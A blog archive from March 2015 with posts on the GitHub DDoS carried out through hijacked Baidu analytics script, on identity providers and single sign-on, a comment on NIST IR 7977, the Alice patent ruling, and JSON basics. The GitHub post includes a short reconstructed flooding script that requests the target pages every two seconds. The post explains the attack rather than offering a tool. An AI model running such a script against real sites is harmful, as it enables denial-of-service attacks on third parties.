Archive for March, 2015

The recent Github attack

2015/03/31

Last Thursday (3/26/2015) a DDoS attack on the code sharing site github.com began, targeting the GitHub pages of greatfire.org, a non-profit that mirrors the web content of sites censored by China, and cn-nytimes.com, a mirror of the Chinese-language edition of The New York Times, which is also censored by China. Connections to github.com are via https and are encrypted. Thus “code” posted can be any content, and China’s Great Firewall can’t filter it when an ordinary citizen retrieves it. China tried to block all of github.com in 2013, but its software technology sector objected to the point that the block was removed.

It appears that there were a number of DDoS attack vectors and techniques, but the one that interested me the most, described in detail by insight-labs, was the hijacking of Baidu’s user-tracking JavaScript (similar to Google Analytics code): the Great Firewall replaced the genuine script with one that requested https://github.com/greatfire/ and https://github.com/cn-nytimes/ every two seconds. Thus every browser that loaded a page carrying Baidu’s popular script became an attack source against GitHub! Since China controls its inner network and the Internet border, it was more or less trivial to insert this MITM (or, as netresec.com calls it, a “man on the side”) attack. Apparently only a small fraction of requests for the Baidu script got the injected payload; most were served normally, so users rarely noticed a glitch.
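
Based on the insight-labs write-up, the injected script behaved roughly like the sketch below. This is a reconstruction for illustration only; the real payload was obfuscated and used the AJAX machinery of its day (fetch() here is just modern shorthand).

    // Reconstruction (for illustration) of the injected attack script;
    // the actual payload was obfuscated and differed in detail.
    const targets = [
      "https://github.com/greatfire/",
      "https://github.com/cn-nytimes/",
    ];
    let i = 0;
    function flood(): void {
      // Request one of the two target pages, then reschedule in 2 seconds.
      fetch(targets[i++ % targets.length], { mode: "no-cors" })
        .catch(() => { /* ignore failures and keep going */ });
      setTimeout(flood, 2000);
    }
    flood();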

The bottom line is that China’s Great Firewall has been converted from a censorship tool into an attack tool. The folks at Baidu claim to know nothing about this, and frankly, I’m hard pressed to figure out what they could have done to prevent this hijack, since the injection happened in the network rather than in their code. Could our NSA hijack Microsoft’s Internet Explorer in this way?

Identity Providers (IdPs) and Identity Management

2015/03/25

The identity management problem is complex and getting more so as the Internet evolves. Within a corporation there are multiple users who have multiple roles. Any given user needs to access several public, multi-tenant resources on the Internet, e.g. public clouds, public backup systems, public SaaS applications, and other services. A user most likely needs such access from multiple devices and from multiple locations around the world. In addition, each user may have several security contexts from which authentication is needed, for example the user’s company, personal use, a charitable organization, a little league sports team, etc. As we’ve discussed before, a username and password for each combination of device, context, and resource is a totally unmanageable situation from many perspectives. Throw in privacy concerns and bad actors who steal and misuse identities, and the computing industry has a serious identity problem.

Inside a federation of multiple Service Providers, multiple corporations of users, multiple types of name directories, and multiple Identity Providers, what makes for a good Identity Provider? More generally, in the context of the federation, what makes for a good Identity Management System?

At the highest level, users want unfettered (and secure) access to lots of Service Providers (SPs). When you see a commercial IdP advertised, usually the first marketing statement is the number of “applications” it supports, and of course there are a few big ones, like Salesforce.com, Office 365, and Google Apps, that are essential. It is not unusual for an IdP to advertise “thousands” of applications. Some applications want strong authentication, some use only certain protocols or data formats, etc. A user’s corporation may insist on the integration of a particular name service, e.g. Active Directory, LDAP, RADIUS, Tivoli Directory, etc. The IdP is in the middle and must support at least those combinations that the customer needs.

Thus, at the next level, the key things one wants an Identity Provider to do are also listed in the marketing material for various IdPs:

  1. Authenticate a user in multiple ways, e.g. extra security questions, hardware fobs, difficult passwords, email, SMS, telephony, X.509, PIN, Common Access Card (CAC), government Personal Identity Verification (PIV) card, smart card, biometric readers, Yubikey, LastPass, KeePass (open-source), etc.
  2. Pass this authentication around the federation (“credential mapping”) without having the user re-authenticate unless additional authentication is needed (as opposed to re-authentication); support OpenID Connect, SAML 2.0, WS-Trust Security Token Service (STS), and others
  3. Allow service providers to require different levels of authentication based on risk or on the importance of the service, using signals such as user IP address, IP reputation, group membership, geo-location, and geo-velocity; support black and white lists to override the risk algorithms (see the sketch after this list)
  4. Support multiple user devices, including mobile
  5. Support multiple application types (SaaS, Web, internal, mobile, …)
  6. Support various name services: AD, LDAP, JDBC, ODBC, Sun One, Novell eDirectory, Tivoli Directory, JBoss Web services, RADIUS, etc.
  7. Support Single Sign On (SSO) via SAML 2.0, OpenID Connect, Kerberos Key Distribution Center (KDC), …
  8. Provide security auditing, e.g. via XDAS
  9. Identify anomalous user activity
  10. Participate in enterprise disaster recovery with high redundancy
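
To make item 3 concrete, here is a minimal sketch, in TypeScript, of how an IdP might score the risk of a log-in and decide whether to demand step-up authentication. The signal names and thresholds are hypothetical; commercial products use far richer models.

    // Hypothetical risk scoring for adaptive authentication (item 3).
    interface LoginSignals {
      ipReputation: number;   // 0 (clean) .. 1 (known bad)
      newDevice: boolean;     // device not seen before for this user
      geoVelocityKmH: number; // implied travel speed since last log-in
      onBlacklist: boolean;   // explicit deny list
      onWhitelist: boolean;   // explicit allow list
    }

    type Decision = "allow" | "step-up" | "deny";

    function decide(s: LoginSignals): Decision {
      // Black and white lists override the risk algorithm entirely.
      if (s.onBlacklist) return "deny";
      if (s.onWhitelist) return "allow";

      let risk = s.ipReputation;
      if (s.newDevice) risk += 0.3;
      if (s.geoVelocityKmH > 1000) risk += 0.5; // faster than an airliner

      if (risk >= 1.0) return "deny";
      if (risk >= 0.4) return "step-up"; // e.g. SMS code or hardware fob
      return "allow";
    }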

Some final thoughts about security: many users, myself included, have been skeptical about the security of an Internet-wide Single Sign On facility. Such a service would be a juicy target for nefarious hackers. Passing around tokens on semi-secure channels appears to invite “pass the hash” and “man in the middle” exploits. The more functionality an IdP product has, the more opportunity for bugs that open security holes. The more personal identifying information a product holds, no matter how well encrypted, the more inviting a target the IdP becomes. In addition, users should worry about who owns the encryption keys and how they are managed. Some vendors are obtaining security certifications such as SSAE 16, SOC 2, or ISO/IEC 27001. A vendor that gets such a certification is not only thinking about security, it is doing something about it.

My next IAM post is on SAML. It is here.

Comments on NIST Interagency Report 7977, Draft 2

2015/03/24

To: crypto-review@nist.gov

Cc: crypto@nist.gov

Re: NIST Interagency Report NISTIR 7977 “NIST Cryptographic Standards and Guidelines Development Process” January 2015 Draft.

Date: March 24, 2015

The January 2015 Draft is a big improvement. In addition, the Summary of Public Comments on NISTIR 7977 (the February 2014 first draft) was quite helpful for comparing how the current draft addresses comments on the first draft. The authors of both new documents are to be commended for their work.

General review comments:

A. Review comments on the first draft of NISTIR 7977 reflect a distrust of the NSA and, by extension, of NIST processes. Suppose China sends NIST an email that says, “Hey, we’ve been studying elliptic curve E over field Z/p with base point Q. It has some neat properties, and China recommends that NIST adopt E for its elliptic curve encryption.” Should NIST consider China’s suggestion? A good test of the processes in NISTIR 7977 would be to answer “yes”, even though we suspect that China knows a backdoor to encryption that uses E. Receiving such a suggestion from the NSA should be treated little differently. Even though NIST is required to consult with the NSA, most independent security consultants, post-Snowden, would not trust a curve suggested by the NSA any more than one suggested by China. I certainly would not. Therefore we look for processes in NISTIR 7977 that politely regard suggestions for tools and algorithms from the NSA with great suspicion. NIST should get expertise and knowledge from the NSA, but should not blindly accept its tools and algorithms. NIST processes for the analysis and acceptance of any suggestion, be it from the NSA, from China, or from any other source, should be equally stringent. In particular, cryptographic technology should not be standardized without significant consensus from a wide swath of independent cryptographers. The current draft of NISTIR 7977 does not place enough emphasis on public analysis and consensus for acceptance.

B. Of course, NIST could standardize, say, an encryption method, even one from a private and independent source, and the NSA, China’s PLA Unit 61398, the UK’s GCHQ, or another nation-state cryptography group could know how to crack it, remaining silent during and after the standardization process. One would hope that NIST, through its own efforts and its financial support of academic and other cryptography research, would facilitate the discovery of the weakness and would quickly retire the standard. Such post-standardization life cycle efforts by NIST also need to be part of NISTIR 7977 [line 727].

C. Now if NIST were to publish a proof that a tool or algorithm received from China, the NSA, or another source in fact had no backdoors and was totally secure, then a consensus on standardization might well be easily achieved. After believing such a proof, I might recommend the proven technology to my clients, but I probably would wait until a large number of non-government cryptographers also believed the proof and were also recommending the technology. NISTIR 7977 says, roughly, that NIST will “pursue” the finding and use of such proofs [line 55]. I’d be happy if NIST worked with the NSA and other agencies on such proofs and would recommend that such efforts be part of NISTIR 7977.

D. NIST publishes security papers at a prodigious rate, so fast that reviews are deemed inadequate. In light of post-Snowden caution around NIST processes, people naturally ask whether these poorly reviewed papers can be trusted. It isn’t going to help if NIST says, “It’s ok, the NSA has reviewed it…” Not only does the current draft of NISTIR 7977 fail to convince that future NIST papers will receive good independent reviews, there is no indication that past NIST papers will retroactively receive good reviews. This is a very sad state of affairs, but it is fixable.

Some more specific review comments:

  1. Clarity of the NIST mission: to develop strong cryptographic standards and guidelines for meeting U.S. federal agency non-national security and commerce needs. This mission should be parsed: to develop strong cryptographic standards and guidelines for meeting (1) U.S. federal agency non-national security needs and (2) commerce needs. My point is that the needs of commerce should be treated by NIST as equal to the needs of any federal agency [line 202 Balance]. For example, federal agencies may well be happy with NSA algorithms, but general commerce may not be.
  2. I do not agree with the NIST Response (page 7 of Summary) to Technical Merit comments that NIST should give priority to non-national security federal information systems. NIST should always make commerce needs equally important. Such a priority statement doesn’t seem to be in NISTIR 7977 explicitly, but there are several statements about NIST being legally required to give such a preference when so ordered by a government entity.
  3. NIST’s statement that it will “never knowingly misrepresent or conceal security properties” [Summary page 3; line 215 Integrity] reminds me of Barry Bonds’s statement that he “never knowingly took growth steroids” when his hat size at the end of his career was three sizes larger than when he was a rookie. I would prefer a more proactive statement such as: “NIST will make every reasonable effort to ensure that military, intelligence, and law enforcement agencies do not, by their suggestions, review comments, or contributions, compromise any security tool or algorithm recommended by NIST.” For NIST standards to regain the confidence of the security and general commerce communities, NIST processes should convincingly ensure, via public actions, that its tools and algorithms do not compromise the privacy or the integrity of any commercial or private message protected by NIST standards.
  4. FISMA requires NIST to consult with certain federal agencies, including the NSA, to avoid duplication of effort and to maintain synergy of federal information protection efforts; but NIST can never again blindly accept a recommendation from any public or private agency. What is important is that NIST actively regain and maintain its process integrity via the new NISTIR 7977. The current draft falls short.
  5. NIST should consider resolving the conundrum of needing frequent NIST output and needing adequate public reviews of that output by creating additional outside paid review boards and conformance testing bodies. One such review board should be established to review the entire Cryptographic Technology Group annually. [lines 316 and 326]
  6. Minutes of the monthly NIST/NSA meetings should be published. [line 377]
  7. Independent review boards should have the power to reject a proposed standard, say if NIST could not convince the board that the NSA or another agency has not compromised the standard. [page 4; lines 47, 403, and 464]
  8. The NISTIR 7977 Development Process itself should undergo regular review and updates at, say, an annual frequency.

Requested Comments [line 125]:

Q: Do the expanded and revised principles state appropriate drivers and conditions for NIST’s efforts related to cryptographic standards and guidelines?

A: Yes, but if the word “appropriate” were replaced by “adequate”, then no. Neither the integrity of NIST processes in the face of NSA influence nor the issue of adequate review is satisfactorily answered. [A, C, D]

Q: Do the revised processes for engaging the cryptographic community provide the necessary inclusivity, transparency and balance to develop strong, trustworthy standards? Are they worded clearly and appropriately? Are there other processes that NIST should consider?

A: No. “Trustworthy” standards need public confidence that neither the NSA nor another agency has added, or knows of, backdoors or other weaknesses in its contributions. Wording isn’t an issue. Different new processes are necessary to separate NIST from NSA and other related agency influence. Post-standardization research efforts should be funded as part of all life cycles. [B]

Q: Do these processes include appropriate mechanisms to ensure that proposed standards and guidelines are reviewed thoroughly and that the views of interested parties are provided to and considered by NIST? Are there other mechanisms NIST should consider?

A: No. Cf. A, C, 2, 3, 4, and 7 above. Regarding 7, if NIST won’t vest veto power in independent reviewers, such experts will tend not to participate. Lack of review resources also seems to be a problem. Cf. 5 above.

Q: Are there other channels or mechanisms that NIST should consider in order to communicate most effectively with its stakeholders?

A: Yes. More paid outside reviewers, including an annual review of the Cryptographic Technology Group. Cf. D and 5 above.

Respectfully submitted,

Gayn B. Winters, Ph.D.

Technology Consultant

SSO – Single Sign On

2015/03/14

Early time-sharing systems provided a security model for the underlying file system that granted access to many services with a single log-in. Access to any branch of the file system was determined by its “ownership” via the familiar Read, Write, Execute flags for Owner, Group, and World.

It wasn’t too long before Owner, Group, World proved too restrictive, and Roles/Groups were introduced: any user could belong to multiple Roles/Groups, and access was determined by the least restrictive flag among the Groups to which that user belonged.
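
A minimal sketch of that access model, with multiple group membership; the type and field names here are mine, not any particular operating system’s.

    // Sketch of the Owner/Group/World model with multiple groups.
    type Perm = { read: boolean; write: boolean; execute: boolean };

    interface FileACL {
      owner: string;
      groups: string[]; // groups granted the "group" bits
      ownerPerm: Perm;
      groupPerm: Perm;
      worldPerm: Perm;
    }

    function canRead(user: string, memberOf: string[], f: FileACL): boolean {
      if (user === f.owner && f.ownerPerm.read) return true;
      // Least restrictive wins: membership in any listed group suffices.
      if (memberOf.some(g => f.groups.includes(g)) && f.groupPerm.read) {
        return true;
      }
      return f.worldPerm.read;
    }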

Clusters of very similar machine types and operating systems, often with a high speed interconnect between the machines and their devices, permitted single sign-on to all the systems in the cluster. Several system vendors provided proprietary clusters.

Microsoft Windows Domains pushed the cluster idea out to the LAN, where multiple LAN vendors had already pioneered single log on. Primary and secondary Domain Controllers on the LAN synchronized user identity data to provide single log on to the domain for every user. We used Domains in our office when we still had a modem connection to the Internet. With time, however, as the Internet provided reasonable speed access to application/service servers around the world, such applications proliferated. There seems to be no end to the creativity of application developers on the web. But now users had to provide separate log on authentication data for each application or service. In the small this was manageable, but it wasn’t too long before what NIST has called “password fatigue” set in. Internet users, wanting to access multiple services, started to:

  • write down their (service or web site) usernames and passwords in documents, spreadsheets, and even on yellow Post-its stuck to their monitors
  • re-use usernames and passwords
  • use overly simple passwords
  • cheat by using the same username (often an email address) and the same simple password across multiple applications and services
  • let their applications remember usernames and passwords, often in world-readable cookies on the workstation
  • lose their usernames and passwords and ask system administrators (or special privileged software) to re-issue them

Aside from being an expensive administrative mess, using multiple usernames and passwords was and still is decidedly insecure. Wouldn’t it be better if a user could sign on to a single service, which in turn could provide automated sign on to application/service servers? Well, yes and no. If such an “identity server” were compromised, then all of its user clients could be totally compromised. On the other hand, great care would probably be given to the construction of such a server, to the secure use of connections to it (e.g. via the latest SSL/TLS), and to the encryption of identity data held within it. With some care, this “IDaaS” could also support mobile devices, business partners (e.g. those in a supply chain), and even the Internet of Things.

The diagram above shows an Identity Provider (IdP) servicing multiple application service providers and multiple clients. The diagram implies that the users all belong to the same enterprise, with a common Name Server and a common IdP. While it would make for a messier diagram, users from multiple enterprises that need to share applications could also be supported.

Provisioning. A user requests application provisioning, either as an initial sign-up or the first time the application is used. The IdP not only provisions the user, but also learns the protocols by which the user (and the IdP) can communicate with the application, including the types of tokens the application will accept for authentication.
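
As a sketch, the per-application record an IdP builds during provisioning might look something like the following; the field names and values are hypothetical.

    // Hypothetical record an IdP might keep for each provisioned
    // application, capturing what it learned at provisioning time.
    interface AppRecord {
      appId: string;
      ssoProtocol: "SAML2" | "OIDC" | "WS-Trust";
      acceptedTokens: Array<"SAML-assertion" | "JWT" | "Kerberos-ticket">;
      endpoint: string; // where assertions/tokens are delivered
      requiresSignedAssertions: boolean;
    }

    const crmApp: AppRecord = {
      appId: "crm.example.com",
      ssoProtocol: "SAML2",
      acceptedTokens: ["SAML-assertion"],
      endpoint: "https://crm.example.com/saml/acs",
      requiresSignedAssertions: true,
    };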

Such complexity tends to bloat IdP implementations, and various schemes for lightweight (or “lighter weight”) identity servers have been proposed that take advantage of existing name servers, identity managers, etc. Some vendors split their implementation into multiple products; for example, some define bridge products that translate one protocol or token format into another. History suggests that this complexity will pass as standards converge and server speeds increase, making full functionality in a single IdP product fast and scalable. Such optimism aside, there are at least a dozen vendors of Single Sign On identity providers today that address this complexity to varying degrees. Each product comes with its own system integration problems, which an enterprise must weigh as it selects a Single Sign On vendor.

When a vendor collapses the IdP and the Name Server into a single product, the result can be interesting. When this product is placed in the cloud, it can be even more interesting. Some security companies have such a product, as does Microsoft with its Azure Active Directory.

I see a lot of “sign on with SocialSite” buttons on various vendor sites. The idea is to let your social site act as an IdP for you; pick your favorite half dozen social sites, and one is probably listed. There is a privacy issue here: signing on with SocialSite can give the vendor access to the information on your social site. This may be ok, but then again, you may not want that vendor or its customers grabbing information off your site or, worse, posting information to it. Personally, I never log in using a social site.

My next IAM post is here.

Alice

2015/03/02

A friend of mine, The Patent King, pointed out to me that the recent court decisions on patents are going to change what software can be patented. This statement looks both backward and forward: the court cases themselves are backward looking, while the Patent Office’s consideration of future patents will be forward looking. These new considerations are collectively called “Alice”, primarily after:

  • Alice: Alice Corp. Pty. Ltd. v. CLS Bank Int’l (2014)

but quite a few other court cases come into play. The references below, all of which I found enlightening, cite such cases.

The technology issue is: What software is patentable? The two-step answer starts simply enough. Step 1: The claim must be directed to a process, machine, manufacture, or composition of matter. This is not new. Typically software patents are directed to processes or to machines, and this post will focus on these.

Step 2 is new: you are almost out of luck if your claim is directed to a law of nature, a natural phenomenon, or an abstract idea; however, Alice provides some wiggle room for dealing with these “judicial exceptions.” Your claim must identify the exception and must state explicitly how your invention, as a whole, amounts to significantly more than the exception.

Of course the trick is to satisfy “significantly more”. This is similar to Potter Stewart’s test for hard-core pornography: “I know it when I see it.” As technologists interested in an issued or a future patent, we must work with our patent attorneys to review as many similar cases as we can and make our arguments accordingly.

The rest of this post considers some interesting exceptions mostly of type “abstract ideas”. These include mathematical formulas, mitigating risk (hedging), using advertising as currency, processing information through a clearing house, authentication, organizing information, formulas for updating alarm limits, comparing new and stored information to identify options for action, etc. The “et cetera” means there is no end to the types of abstract ideas.

Returning to the Alice case itself: the patent covered a computer system that acted as an intermediary, maintaining and adjusting account balances to satisfy business obligations and settlement risk. Since this is a long-standing commercial practice, and the patent claims this abstract idea, it is a judicial exception. However, viewing the claim as a whole, it failed to add significantly more to the abstract idea. In other words, just crunching the numbers on a computer system is not patentable.

The Ultramercial patent 7,346,545 (the “545 patent”) provided an interesting case. The patent concerned an eleven-step process whereby a consumer receives copyrighted material in exchange for viewing an advertisement. Ultramercial sued Hulu, YouTube, and WildTangent for patent infringement. The case bounced around the courts, but after Alice it was determined that the eleven steps, taken as a whole, merely implemented the abstract idea of using ads as currency and did not add significantly more to that abstract concept. The 545 patent was ultimately declared invalid.

The case Bilski v. Kappos (2010) concerned Bilski’s patent application on hedging to mitigate risk in commodities trading. The application was deemed too broad, covering well-known practices in a comprehensive way. Fundamentally, one cannot patent an invention that covers an entire abstract and well-known idea.

Mayo Collaborative Services v. Prometheus Labs., Inc. (2012) provides an example where an action (raising or lowering the amount of a drug administered) was taken based on a blood test (for metabolites). The action would be normal for any well-informed doctor. This case actually falls under the law-of-nature exception, but the principle applies elsewhere: if all your software does is automate what a trained practitioner does normally, then it is not patentable.

Ancora Technologies, Inc. v. Apple, Inc. is interesting and is not yet resolved. Ancora’s invention was to put authentication software in the flash memory reserved for the BIOS, making it more difficult for a hacker to get around the authentication check. Ancora sued Apple for infringement of its patent 6,411,941 (the “941 patent”). If it is accepted that authentication checks are abstract ideas, then is putting such a check in the BIOS flash significantly more than other implementations of this abstract idea? If putting such a check on a hard disk is not patentable, then why should putting it in the BIOS flash be patentable? Is the method of putting the check in the BIOS flash without corrupting the BIOS a patentable, significant extension of the abstract idea? Apple has appealed to the Supreme Court.

There are some interesting ramifications of Alice to the cloud, data analytics, and cyber-security worlds. Look for future posts on these topics.

Recommended Reading:

Go Ask Alice – Delightful paper by Berkeley law professor Robert Merges

Patent Eligibility in the Wake of Alice – Nice analysis by Berkowitz and Schaffner

Summary of Ancora v. Apple – by IP firm Sughrue Mion

Apple appeals Ancora Ruling – News flash from Law360

USPTO 2014 Interim Alice Training – Very good slide-set tutorial

JSON – JavaScript Object Notation

2015/03/01

For reasons that are inexplicable to me, JSON is not quite a subset of JavaScript; the culprit is a few weird non-escaped characters (the Unicode line and paragraph separators U+2028 and U+2029 are legal unescaped in JSON strings but not in JavaScript strings). Cf. RFC 7159. JSON is a language-independent data format. A formal definition and parsing libraries for various programming languages can be found on JSON.org. Briefly, JSON’s data types are:

  • Number – a signed decimal number with optional fractional part and optional exponent E part. JSON numbers are typically implemented as double precision floating point numbers.
  • String – zero or more Unicode characters bracketed by double quotes. A backslash is the escape character.
  • Boolean – true or false
  • Array – ordered list of zero or more values of any JSON type, delimited by square brackets, and separated by commas.
  • Null – the empty value, written null.
  • Object – an unordered set of comma-separated name:value pairs delimited by braces. The names are Strings; it is recommended that they be unique so that Objects can implement associative arrays.
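
Here is a small, contrived document exercising each of these types:

    {
      "name": "example",
      "version": 2,
      "price": 19.95,
      "active": true,
      "parent": null,
      "tags": ["json", "data", "format"],
      "nested": { "unicode": "caf\u00e9" }
    }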

JSON values are: number, string, array, object, true, false, and null. Whitespace characters are: space, tab, line feed and carriage return. Whitespace can be used around and between values and punctuation.

Recent identity management standards (but not SAML) use JSON to encode:

  • JWT – JSON Web Tokens (an example follows this list)
  • JWK – JSON Web Keys
  • JWE – JSON Web Encryption
  • JWA – JSON Web Algorithms
  • JWS – JSON Web Signatures
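
For example, a JWT is three base64url-encoded segments separated by dots (header.payload.signature); the first two decode to plain JSON objects along the following lines. The claim values here are made up.

Decoded header:

    { "alg": "RS256", "typ": "JWT" }

Decoded payload (the claims):

    {
      "iss": "https://idp.example.com",
      "sub": "user1234",
      "aud": "crm.example.com",
      "iat": 1427496400,
      "exp": 1427500000
    }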

Subtle points: JSON doesn’t distinguish among various implementations of Number, e.g. support for signed zeros, underflows and overflows, integers, etc. There is no support for the JavaScript data types Date, Error, Regular Expression, Function, and undefined (other than null). And even though a properly escaped JSON value is also a JavaScript value, the use of eval() to parse JSON is not recommended. Use JSON.parse() instead of eval().
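
A minimal illustration of the safe versus unsafe approaches:

    // Safe: JSON.parse accepts only JSON and never executes code.
    const obj = JSON.parse('{"user": "alice", "admin": false}');
    console.log(obj.user); // prints "alice"

    // Unsafe: eval executes arbitrary JavaScript, so attacker-supplied
    // text can run code in your page. Don't do this:
    //   const bad = eval("(" + untrustedText + ")");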

The next IAM post is Single Sign On (SSO) here.